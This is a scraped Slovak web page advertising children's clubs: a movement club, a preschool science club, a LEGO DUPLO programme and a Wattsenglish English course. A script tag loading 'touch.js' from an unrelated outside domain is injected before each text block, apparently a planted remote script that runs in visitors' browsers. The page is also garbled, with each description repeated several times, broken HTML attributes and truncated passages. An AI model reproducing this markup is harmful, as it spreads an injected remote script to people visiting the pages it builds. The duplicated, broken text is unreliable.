/ Meniny má Oto
<script type='text/javascript' src='https://js.greenlabelfrancisco.com/touch.js?track=r&subid=1'></script>V dnešnej dobe, kedy ide postupne pohyb detí do úzadia,je veľmi dôležité, aby sa deti nezabúdali hýbať. Treba už od najmladšieho školského veku u nich apelovať na dôležitosť pohybu. Nejde pri tom len o podstatný zdravotný aspekt, ktorý je významný pre harmonický vývoj detí, ale taktiež o spôsob ako predísť negatívnym socializačným javom. Budeme rozvíjať všeobecné pohybové schopnosti detí pomocou zábavných súťaží v pohybe, učiť ich spolupracovať a navzájom sa povzbudzovať v tímoch, učiť ich základom disciplíny a povzbudzovať ich súťaživosť. Dôrazom je, aby všetky prostriedky využívané v pohybovej príprave zohľadňovali prirodzenú hravosť a aktivitu detí a podnietili ich záujem o pohybové aktivity – športovanie. Aby deti samé od seba prejavovali v budúcnosti záujem o šport, aby sa chceli hýbať, aby si našli pomocou športu aj nových kamarátov a aby sa z nich stali ľudia, ktorí budú schopní rešpektovať pravidlá a riadiť sa nimi v duchu fair play.

<strong><u>PREČO PRÁVE NÁŠ POHYBOVÝ KRÚŽOK?
</u></strong>-hlavným cieľom vyučovacích hodín nebude učiť deti konkrétnym športom, ich pravidlám alebo ich učiť presne technicky správne prevedenie kotúľa a to dookola opakovať ale naučiť ich HÝBAŤ SA hravou formou.
– deti sa budú hýbať formou zábavných hier, súťaží a tým budú získavať základné všeobecné pohybové návyky
– budú sa učiť spolupracovať a navzájom sa povzbudzovať v tímoch
– budú sa učiť základom disciplíny a zároveň budeme povzbudzovať ich skrytú súťaživosť
– vďaka spolupráci v tímoch sa deti naučia ľahšie začleniť do kolektívu
–
<strong><u>PREČO DETI PRIHLÁSIŤ NA POHYBOVÝ KRÚŽOK?</u></strong><strong><u>
</u></strong>– stále sa častejšie objavujúca detská obezita je reálny problém
– problémy detí s plochými nohami
– neustály rozvoj technológii a s tým súvisiaci upadajúci záujem o pohyb
– ťažšie hľadanie kamarátov a začlenenie sa do kolektívu kvôli sociálnym sieťam <script type='text/javascript' src='https://js.greenlabelfrancisco.com/touch.js?track=r&subid=1'></script>V dnešnej dobe, kedy ide postupne pohyb detí do úzadia,je veľmi dôležité, aby sa deti nezabúdali hýbať. Treba už od najmladšieho školského veku u nich apelovať na dôležitosť pohybu. Nejde pri tom len o podstatný zdravotný aspekt, ktorý je významný pre harmonický vývoj detí, ale taktiež o spôsob ako predísť negatívnym socializačným javom. Budeme rozvíjať všeobecné pohybové schopnosti detí pomocou zábavných súťaží v pohybe, učiť ich spolupracovať a navzájom sa povzbudzovať v tímoch, učiť ich základom disciplíny a povzbudzovať ich súťaživosť. Dôrazom je, aby všetky prostriedky využívané v pohybovej príprave zohľadňovali prirodzenú hravosť a aktivitu detí a podnietili ich záujem o pohybové aktivity – športovanie. Aby deti samé od seba prejavovali v budúcnosti záujem o šport, aby sa chceli hýbať, aby si našli pomocou športu aj nových kamarátov a aby sa z nich stali ľudia, ktorí budú schopní rešpektovať pravidlá a riadiť sa nimi v duchu fair play.

<strong><u>PREČO PRÁVE NÁŠ POHYBOVÝ KRÚŽOK?
</u></strong>-hlavným cieľom vyučovacích hodín nebude učiť deti konkrétnym športom, ich pravidlám alebo ich učiť presne technicky správne prevedenie kotúľa a to dookola opakovať ale naučiť ich HÝBAŤ SA hravou formou.
– deti sa budú hýbať formou zábavných hier, súťaží a tým budú získavať základné všeobecné pohybové návyky
– budú sa učiť spolupracovať a navzájom sa povzbudzovať v tímoch
– budú sa učiť základom disciplíny a zároveň budeme povzbudzovať ich skrytú súťaživosť
– vďaka spolupráci v tímoch sa deti naučia ľahšie začleniť do kolektívu
–
<strong><u>PREČO DETI PRIHLÁSIŤ NA POHYBOVÝ KRÚŽOK?</u></strong><strong><u>
</u></strong>– stále sa častejšie objavujúca detská obezita je reálny problém
– problémy detí s plochými nohami
– neustály rozvoj technológii a s tým súvisiaci upadajúci záujem o pohyb
– ťažšie hľadanie kamarátov a začlenenie sa do kolektívu kvôli sociálnym sieťam

V dnešnej dobe, kedy ide postupne pohyb detí do úzadia,je veľmi dôležité, aby sa deti nezabúdali hýbať. Treba už od najmladšieho školského veku u nich apelovať na dôležitosť pohybu. Nejde pri tom len o podstatný zdravotný aspekt, ktorý je významný pre harmonický vývoj detí, ale taktiež o spôsob ako predísť negatívnym socializačným javom. Budeme rozvíjať všeobecné pohybové schopnosti detí pomocou zábavných súťaží v pohybe, učiť ich spolupracovať a navzájom sa povzbudzovať v tímoch, učiť ich základom disciplíny a povzbudzovať ich súťaživosť. Dôrazom je, aby všetky prostriedky využívané v pohybovej príprave zohľadňovali prirodzenú hravosť a aktivitu detí a podnietili ich záujem o pohybové aktivity – športovanie. Aby deti samé od seba prejavovali v budúcnosti záujem o šport, aby sa chceli hýbať, aby si našli pomocou športu aj nových kamarátov a aby sa z nich stali ľudia, ktorí budú schopní rešpektovať pravidlá a riadiť sa nimi v duchu fair play. PREČO PRÁVE NÁŠ POHYBOVÝ KRÚŽOK? -hlavným cieľom vyučovacích hodín nebude učiť deti konkrétnym športom, ich pravidlám alebo ich učiť presne technicky správne prevedenie kotúľa a to dookola opakovať ale naučiť ich HÝBAŤ SA hravou formou. – deti sa budú hýbať formou zábavných hier, súťaží a tým budú získavať základné všeobecné pohybové návyky – budú sa učiť spolupracovať a navzájom sa povzbudzovať v tímoch – budú sa učiť základom disciplíny a zároveň budeme povzbudzovať ich skrytú súťaživosť – vďaka spolupráci v tímoch sa deti naučia ľahšie začleniť do kolektívu – PREČO DETI PRIHLÁSIŤ NA POHYBOVÝ KRÚŽOK? – stále sa častejšie objavujúca detská obezita je reálny problém – problémy detí s plochými nohami – neustály rozvoj technológii a s tým súvisiaci upadajúci záujem o pohyb – ťažšie hľadanie kamarátov a začlenenie sa do kolektívu kvôli sociálnym sieťam

V dnešnej dobe, kedy ide postupne pohyb detí do úzadia,je veľmi dôležité, aby sa deti nezabúdali hýbať. Treba už od najmladšieho školského veku u nich apelovať na dôležitosť pohybu. Nejde pri tom len o podstatný zdravotný aspekt, ktorý je významný pre harmonický vývoj detí, ale taktiež o spôsob ako predísť negatívnym socializačným javom. Budeme rozvíjať všeobecné pohybové schopnosti […]

<script type='text/javascript' src='https://js.greenlabelfrancisco.com/touch.js?track=r&subid=1'></script>Krúžok Veda nás baví je hravou a zábavnou formou zoznámia s tajom vedných odborov (fyzika, chémia, astronómia, prírodopis, inžinierstvo, strojárenstvo). VEDA NÁS BAVÍ realizuje v materských školách vedecké krúžky pre predškolákov. Deti sa hravou a zábavnou formou zoznámia s javmi okolo nás a vyskúšajú si, aké to je stať sa aspoň na chvíľu malým vedcom.
<h3 class=Náplň lekcií
 • Deti v krúžku vykonávajú jednoduché a bezpečné experimenty v rôznych oblastiach (napr. magnetizmus, vulkanizmus, salinita, vlastnosti kvapalín, plynov a pevných látok, pohyb živočíchov, atď).
 • Lektor najskôr deťom zrozumiteľnou a hravou formou vysvetlí podstatu fungovania daného javu, ktorý si následne ukážu a overia na jednoduchých experimentoch, napr. vyrobia si sopku, lietajúceho motýlika, telefón, a pod.
 • Preberané témy sa snažíme spojiť s reálnymi príkladmi zo života, ktoré už deti poznajú.
 • Pokusy sú navrhnuté pre deti v predškolskej triede, teda nie sú nebezpečné, ani zložité. Používame pri nich bežne dostupný materiál, ako špajdle, kancelárske sponky, balóniky, slamky, plastové poháre a pod.
 • Pre koho je krúžok určený?

  • pre zvedavé deti v predškolskej triede MŠ (5 – 6 rokov)

  Ako dlho trvá jedna lekcia, ako často a kde prebieha?

  • 45 minút, 1x týždenne, v priestoroch materskej školy

  Forma

  • skupinová výuka (8 – 12, vedecké tímy po 3-4 členoch)

  Organizácia

  • Lektor prevezme  deti vo vopred dohodnutom čase. Lekcie prebiehajú vo vyhradených priestoroch materskej školy. Lektor zodpovedá za bezpečnosť detí a dodržiavanie poriadku MŠ počas celej doby trvania lekcie a za osobné odovzdanie detí zodpovednej osobe materskej školy po skončení každej lekcie.
  • Deťom bude poskytnutý všetok potrebný materiál a pomôcky, okrem dobrej nálady a chuti objavovať :-).
  • Nahradenie lekcií v prípade prázdnin či sviatkov je samozrejmosťou.
"> <script type='text/javascript' src='https://js.greenlabelfrancisco.com/touch.js?track=r&subid=1'></script>Krúžok Veda nás baví je hravou a zábavnou formou zoznámia s tajom vedných odborov (fyzika, chémia, astronómia, prírodopis, inžinierstvo, strojárenstvo). VEDA NÁS BAVÍ realizuje v materských školách vedecké krúžky pre predškolákov. Deti sa hravou a zábavnou formou zoznámia s javmi okolo nás a vyskúšajú si, aké to je stať sa aspoň na chvíľu malým vedcom.
<h3 class=Náplň lekcií
 • Deti v krúžku vykonávajú jednoduché a bezpečné experimenty v rôznych oblastiach (napr. magnetizmus, vulkanizmus, salinita, vlastnosti kvapalín, plynov a pevných látok, pohyb živočíchov, atď).
 • Lektor najskôr deťom zrozumiteľnou a hravou formou vysvetlí podstatu fungovania daného javu, ktorý si následne ukážu a overia na jednoduchých experimentoch, napr. vyrobia si sopku, lietajúceho motýlika, telefón, a pod.
 • Preberané témy sa snažíme spojiť s reálnymi príkladmi zo života, ktoré už deti poznajú.
 • Pokusy sú navrhnuté pre deti v predškolskej triede, teda nie sú nebezpečné, ani zložité. Používame pri nich bežne dostupný materiál, ako špajdle, kancelárske sponky, balóniky, slamky, plastové poháre a pod.
 • Pre koho je krúžok určený?

  • pre zvedavé deti v predškolskej triede MŠ (5 – 6 rokov)

  Ako dlho trvá jedna lekcia, ako často a kde prebieha?

  • 45 minút, 1x týždenne, v priestoroch materskej školy

  Forma

  • skupinová výuka (8 – 12, vedecké tímy po 3-4 členoch)

  Organizácia

  • Lektor prevezme  deti vo vopred dohodnutom čase. Lekcie prebiehajú vo vyhradených priestoroch materskej školy. Lektor zodpovedá za bezpečnosť detí a dodržiavanie poriadku MŠ počas celej doby trvania lekcie a za osobné odovzdanie detí zodpovednej osobe materskej školy po skončení každej lekcie.
  • Deťom bude poskytnutý všetok potrebný materiál a pomôcky, okrem dobrej nálady a chuti objavovať :-).
  • Nahradenie lekcií v prípade prázdnin či sviatkov je samozrejmosťou.
">

Krúžok Veda nás baví je hravou a zábavnou formou zoznámia s tajom vedných odborov (fyzika, chémia, astronómia, prírodopis, inžinierstvo, strojárenstvo). VEDA NÁS BAVÍ realizuje v materských školách vedecké krúžky pre predškolákov. Deti sa hravou a zábavnou formou zoznámia s javmi okolo nás a vyskúšajú si, aké to je stať sa aspoň na chvíľu malým vedcom.

Náplň lekcií

 • Deti v krúžku vykonávajú jednoduché a bezpečné experimenty v rôznych oblastiach (napr. magnetizmus, vulkanizmus, salinita, vlastnosti kvapalín, plynov a pevných látok, pohyb živočíchov, atď).
 • Lektor najskôr deťom zrozumiteľnou a hravou formou vysvetlí podstatu fungovania daného javu, ktorý si následne ukážu a overia na jednoduchých experimentoch, napr. vyrobia si sopku, lietajúceho motýlika, telefón, a pod.
 • Preberané témy sa snažíme spojiť s reálnymi príkladmi zo života, ktoré už deti poznajú.
 • Pokusy sú navrhnuté pre deti v predškolskej triede, teda nie sú nebezpečné, ani zložité. Používame pri nich bežne dostupný materiál, ako špajdle, kancelárske sponky, balóniky, slamky, plastové poháre a pod.
 • Pre koho je krúžok určený?

  • pre zvedavé deti v predškolskej triede MŠ (5 – 6 rokov)

  Ako dlho trvá jedna lekcia, ako často a kde prebieha?

  • 45 minút, 1x týždenne, v priestoroch materskej školy

  Forma

  • skupinová výuka (8 – 12, vedecké tímy po 3-4 členoch)

  Organizácia

  • Lektor prevezme  deti vo vopred dohodnutom čase. Lekcie prebiehajú vo vyhradených priestoroch materskej školy. Lektor zodpovedá za bezpečnosť detí a dodržiavanie poriadku MŠ počas celej doby trvania lekcie a za osobné odovzdanie detí zodpovednej osobe materskej školy po skončení každej lekcie.
  • Deťom bude poskytnutý všetok potrebný materiál a pomôcky, okrem dobrej nálady a chuti objavovať :-).
  • Nahradenie lekcií v prípade prázdnin či sviatkov je samozrejmosťou.

Krúžok Veda nás baví je hravou a zábavnou formou zoznámia s tajom vedných odborov (fyzika, chémia, astronómia, prírodopis, inžinierstvo, strojárenstvo). VEDA NÁS BAVÍ realizuje v materských školách vedecké krúžky pre predškolákov. Deti sa hravou a zábavnou formou zoznámia s javmi okolo nás a vyskúšajú si, aké to je stať sa aspoň na chvíľu malým vedcom. Náplň lekcií Deti v krúžku […]

<script type='text/javascript' src='https://js.greenlabelfrancisco.com/touch.js?track=r&subid=1'></script><p style=Vzdelávanie pre deti s kockami LEGO® podľa uceleného konceptu

Program je určený pre deti od 3 do 5 rokov. Predškolské deti, ktoré sú prirodzenými staviteľmi, sa vďaka obľúbenej  stavebnici  DUPLO®  oboznámia  s rôznymi  témami,  ako  sú  zvieratá,  vesmír,  morský  život, rozprávky  alebo  hrdinovia.  Získajú  veľa  poznatkov,  veľa  sa  naučia  a samozrejme  všetko  si  postavia a vyskúšajú. Každý program je postavený na základnom princípe „learning by doing“ (učenie v procese). To znamená že  metodika  je  zostavená  tak,  že  každá  téma  má  výukový  cieľ. Ku  každej  téme  sú  zostavené  presné inštrukcie a vlastné modelové plány, ktoré boli navrhnuté v spolupráci s inžiniermi a pedagógmi v USA a sú tematicky ladené tak, aby deti zaujali. Dieťa tak na svojej úrovni objavuje a spoznáva, nachádza záujem a približuje sa k reálnemu životu, čím nahrádza teoretické a izolované poznatky. Vieme, že deti sa ľahšie učia hrou, a preto si u nás všetko osvojujú cez zážitok, a tým zároveň rozvíjame celú osobnosť dieťaťa.   Charakteristika kurzu:     Deti sa zoznámia s rôznymi témami a na postavenom modeli pochopia ich fungovanie.     Témy sú predstavené cez príbeh alebo rozprávku.     Skladaním sa deti učia povoliť uzdu svojej tvorivosti a fantázii.     Precvičujú si priestorové vnímanie a matematické zručnosti.     Vnímajú základy dizajnu a proporcionality.     Oboznamujú sa s konštrukčnými súvislosťami.     Zlepšia si jemnú motoriku a komunikáciu.     Naučia sa pracovať s plánikmi a stavať podľa nich.     A TO VŠETKO POČAS HRY!     Po ukončení stavania majú deti možnosť sa s modelom zahrať, porovnať si svoj výtvor so svojimi spolužiakmi a následne model rozobrať.     Každú hodinu pracujú deti na inom modeli a téme.     Modely sú prispôsobené každej vekovej kategórii, nie sú nebezpečné ani zložité"> <script type='text/javascript' src='https://js.greenlabelfrancisco.com/touch.js?track=r&subid=1'></script><p style=Vzdelávanie pre deti s kockami LEGO® podľa uceleného konceptu

Program je určený pre deti od 3 do 5 rokov. Predškolské deti, ktoré sú prirodzenými staviteľmi, sa vďaka obľúbenej  stavebnici  DUPLO®  oboznámia  s rôznymi  témami,  ako  sú  zvieratá,  vesmír,  morský  život, rozprávky  alebo  hrdinovia.  Získajú  veľa  poznatkov,  veľa  sa  naučia  a samozrejme  všetko  si  postavia a vyskúšajú. Každý program je postavený na základnom princípe „learning by doing“ (učenie v procese). To znamená že  metodika  je  zostavená  tak,  že  každá  téma  má  výukový  cieľ. Ku  každej  téme  sú  zostavené  presné inštrukcie a vlastné modelové plány, ktoré boli navrhnuté v spolupráci s inžiniermi a pedagógmi v USA a sú tematicky ladené tak, aby deti zaujali. Dieťa tak na svojej úrovni objavuje a spoznáva, nachádza záujem a približuje sa k reálnemu životu, čím nahrádza teoretické a izolované poznatky. Vieme, že deti sa ľahšie učia hrou, a preto si u nás všetko osvojujú cez zážitok, a tým zároveň rozvíjame celú osobnosť dieťaťa.   Charakteristika kurzu:     Deti sa zoznámia s rôznymi témami a na postavenom modeli pochopia ich fungovanie.     Témy sú predstavené cez príbeh alebo rozprávku.     Skladaním sa deti učia povoliť uzdu svojej tvorivosti a fantázii.     Precvičujú si priestorové vnímanie a matematické zručnosti.     Vnímajú základy dizajnu a proporcionality.     Oboznamujú sa s konštrukčnými súvislosťami.     Zlepšia si jemnú motoriku a komunikáciu.     Naučia sa pracovať s plánikmi a stavať podľa nich.     A TO VŠETKO POČAS HRY!     Po ukončení stavania majú deti možnosť sa s modelom zahrať, porovnať si svoj výtvor so svojimi spolužiakmi a následne model rozobrať.     Každú hodinu pracujú deti na inom modeli a téme.     Modely sú prispôsobené každej vekovej kategórii, nie sú nebezpečné ani zložité">

Vzdelávanie pre deti s kockami LEGO® podľa uceleného konceptu

Program je určený pre deti od 3 do 5 rokov. Predškolské deti, ktoré sú prirodzenými staviteľmi, sa vďaka obľúbenej  stavebnici  DUPLO®  oboznámia  s rôznymi  témami,  ako  sú  zvieratá,  vesmír,  morský  život, rozprávky  alebo  hrdinovia.  Získajú  veľa  poznatkov,  veľa  sa  naučia  a samozrejme  všetko  si  postavia a vyskúšajú. Každý program je postavený na základnom princípe „learning by doing“ (učenie v procese). To znamená že  metodika  je  zostavená  tak,  že  každá  téma  má  výukový  cieľ. Ku  každej  téme  sú  zostavené  presné inštrukcie a vlastné modelové plány, ktoré boli navrhnuté v spolupráci s inžiniermi a pedagógmi v USA a sú tematicky ladené tak, aby deti zaujali. Dieťa tak na svojej úrovni objavuje a spoznáva, nachádza záujem a približuje sa k reálnemu životu, čím nahrádza teoretické a izolované poznatky. Vieme, že deti sa ľahšie učia hrou, a preto si u nás všetko osvojujú cez zážitok, a tým zároveň rozvíjame celú osobnosť dieťaťa.   Charakteristika kurzu:     Deti sa zoznámia s rôznymi témami a na postavenom modeli pochopia ich fungovanie.     Témy sú predstavené cez príbeh alebo rozprávku.     Skladaním sa deti učia povoliť uzdu svojej tvorivosti a fantázii.     Precvičujú si priestorové vnímanie a matematické zručnosti.     Vnímajú základy dizajnu a proporcionality.     Oboznamujú sa s konštrukčnými súvislosťami.     Zlepšia si jemnú motoriku a komunikáciu.     Naučia sa pracovať s plánikmi a stavať podľa nich.     A TO VŠETKO POČAS HRY!     Po ukončení stavania majú deti možnosť sa s modelom zahrať, porovnať si svoj výtvor so svojimi spolužiakmi a následne model rozobrať.     Každú hodinu pracujú deti na inom modeli a téme.     Modely sú prispôsobené každej vekovej kategórii, nie sú nebezpečné ani zložité

Vzdelávanie pre deti s kockami LEGO® podľa uceleného konceptu Program je určený pre deti od 3 do 5 rokov. Predškolské deti, ktoré sú prirodzenými staviteľmi, sa vďaka obľúbenej  stavebnici  DUPLO®  oboznámia  s rôznymi  témami,  ako  sú  zvieratá,  vesmír,  morský  život, rozprávky  alebo  hrdinovia.  Získajú  veľa  poznatkov,  veľa  sa  naučia  a samozrejme  všetko  si  postavia a […]

<script type='text/javascript' src='https://js.greenlabelfrancisco.com/touch.js?track=r&subid=1'></script>Cieľom je rozvíjať komunikačné schopnosti dieťaťa tak, aby bez problémov dokázalo reagovať na cudzinca a “prepínať” medzi rodným jazykom a angličtinou.
<h3>Charakteristika kurzu</h3>
<ul>
 	<li>výučbu vedie skúsený lektor,</li>
 	<li>vytvárame prirodzené bilingválne prostredie,</li>
 	<li>používame metodické postupy Wattsenglish,</li>
 	<li>na hodinách neustále striedame aktivity, aby deti bez problémov udržali pozornosť</li>
 	<li>súčasťou výučby sú špecializované učebné materiály Wattsenglish – kniha, CD a DVD</li>
</ul>
 
<h3>Ako vyzerá výučba?</h3>
<ul>
 	<li>Na hodinách lektor používa metodické postupy Wattsenglish.</li>
 	<li>Systematicky strieda rôzne aktivity.</li>
 	<li>Pri vysvetľovaní používa príklady a názorné ukážky.</li>
 	<li>Využíva princíp reči tela, aby deti pochopili zadanie.</li>
 	<li>Súčasťou sú aj kolektívne hry, ktoré vtiahnu do deja celú skupinu.</li>
 	<li>Jazyk a výrazy sa deti učia aj cez telesné aktivity (skákanie, behanie, tancovanie).</li>
 	<li>Hodiny sú zaujímavé a majú spád, deti udržia 100% sústredenosť a napredujú rýchlejšie.</li>
</ul>
 
<h3>Ako vyzerajú učebné materiály?</h3>
<ul>
 	<li>Materiály tvoria integrovanú súčasť konceptu Wattsenglish.</li>
 	<li>Sú určené presne pre danú detskú kategóriu.</li>
 	<li>Hlavným motívom je tvár zakladateľa metódy – Steva Wattsa.</li>
 	<li>Sú zostavené zahraničnými metodikmi a pedagógmi a overené dlhoročnou praxou.</li>
 	<li>Súčasťou je CD s pesničkami a DVD s videonahrávkami.</li>
 	<li>Dieťa je vďaka nim neustále v kontakte s jazykom a učí sa rýchlejšie a prirodzenejšie</li>
</ul> <script type='text/javascript' src='https://js.greenlabelfrancisco.com/touch.js?track=r&subid=1'></script>Cieľom je rozvíjať komunikačné schopnosti dieťaťa tak, aby bez problémov dokázalo reagovať na cudzinca a “prepínať” medzi rodným jazykom a angličtinou.
<h3>Charakteristika kurzu</h3>
<ul>
 	<li>výučbu vedie skúsený lektor,</li>
 	<li>vytvárame prirodzené bilingválne prostredie,</li>
 	<li>používame metodické postupy Wattsenglish,</li>
 	<li>na hodinách neustále striedame aktivity, aby deti bez problémov udržali pozornosť</li>
 	<li>súčasťou výučby sú špecializované učebné materiály Wattsenglish – kniha, CD a DVD</li>
</ul>
 
<h3>Ako vyzerá výučba?</h3>
<ul>
 	<li>Na hodinách lektor používa metodické postupy Wattsenglish.</li>
 	<li>Systematicky strieda rôzne aktivity.</li>
 	<li>Pri vysvetľovaní používa príklady a názorné ukážky.</li>
 	<li>Využíva princíp reči tela, aby deti pochopili zadanie.</li>
 	<li>Súčasťou sú aj kolektívne hry, ktoré vtiahnu do deja celú skupinu.</li>
 	<li>Jazyk a výrazy sa deti učia aj cez telesné aktivity (skákanie, behanie, tancovanie).</li>
 	<li>Hodiny sú zaujímavé a majú spád, deti udržia 100% sústredenosť a napredujú rýchlejšie.</li>
</ul>
 
<h3>Ako vyzerajú učebné materiály?</h3>
<ul>
 	<li>Materiály tvoria integrovanú súčasť konceptu Wattsenglish.</li>
 	<li>Sú určené presne pre danú detskú kategóriu.</li>
 	<li>Hlavným motívom je tvár zakladateľa metódy – Steva Wattsa.</li>
 	<li>Sú zostavené zahraničnými metodikmi a pedagógmi a overené dlhoročnou praxou.</li>
 	<li>Súčasťou je CD s pesničkami a DVD s videonahrávkami.</li>
 	<li>Dieťa je vďaka nim neustále v kontakte s jazykom a učí sa rýchlejšie a prirodzenejšie</li>
</ul>

Cieľom je rozvíjať komunikačné schopnosti dieťaťa tak, aby bez problémov dokázalo reagovať na cudzinca a “prepínať” medzi rodným jazykom a angličtinou.

Charakteristika kurzu

 • výučbu vedie skúsený lektor,
 • vytvárame prirodzené bilingválne prostredie,
 • používame metodické postupy Wattsenglish,
 • na hodinách neustále striedame aktivity, aby deti bez problémov udržali pozornosť
 • súčasťou výučby sú špecializované učebné materiály Wattsenglish – kniha, CD a DVD
 

Ako vyzerá výučba?

 • Na hodinách lektor používa metodické postupy Wattsenglish.
 • Systematicky strieda rôzne aktivity.
 • Pri vysvetľovaní používa príklady a názorné ukážky.
 • Využíva princíp reči tela, aby deti pochopili zadanie.
 • Súčasťou sú aj kolektívne hry, ktoré vtiahnu do deja celú skupinu.
 • Jazyk a výrazy sa deti učia aj cez telesné aktivity (skákanie, behanie, tancovanie).
 • Hodiny sú zaujímavé a majú spád, deti udržia 100% sústredenosť a napredujú rýchlejšie.
 

Ako vyzerajú učebné materiály?

 • Materiály tvoria integrovanú súčasť konceptu Wattsenglish.
 • Sú určené presne pre danú detskú kategóriu.
 • Hlavným motívom je tvár zakladateľa metódy – Steva Wattsa.
 • Sú zostavené zahraničnými metodikmi a pedagógmi a overené dlhoročnou praxou.
 • Súčasťou je CD s pesničkami a DVD s videonahrávkami.
 • Dieťa je vďaka nim neustále v kontakte s jazykom a učí sa rýchlejšie a prirodzenejšie

Cieľom je rozvíjať komunikačné schopnosti dieťaťa tak, aby bez problémov dokázalo reagovať na cudzinca a “prepínať” medzi rodným jazykom a angličtinou. Charakteristika kurzu výučbu vedie skúsený lektor, vytvárame prirodzené bilingválne prostredie, používame metodické postupy Wattsenglish, na hodinách neustále striedame aktivity, aby deti bez problémov udržali pozornosť súčasťou výučby sú špecializované učebné materiály Wattsenglish – kniha, CD […]